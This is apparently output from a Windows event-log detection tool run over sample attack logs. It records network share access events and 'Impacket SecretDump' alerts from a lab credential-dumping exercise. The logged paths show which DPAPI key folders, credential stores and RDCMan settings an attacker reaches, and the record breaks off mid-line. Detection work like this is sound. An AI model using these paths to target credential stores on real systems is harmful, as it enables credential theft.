0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote 
Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote 
Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 20:53:07.706 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.310 
+09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ 
| Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.632 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.648 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.680 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.716 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.732 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password 
Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.763 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.779 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.794 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.810 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.826 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.841 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 
20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.889 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.905 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from 
Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.920 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:11.940 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 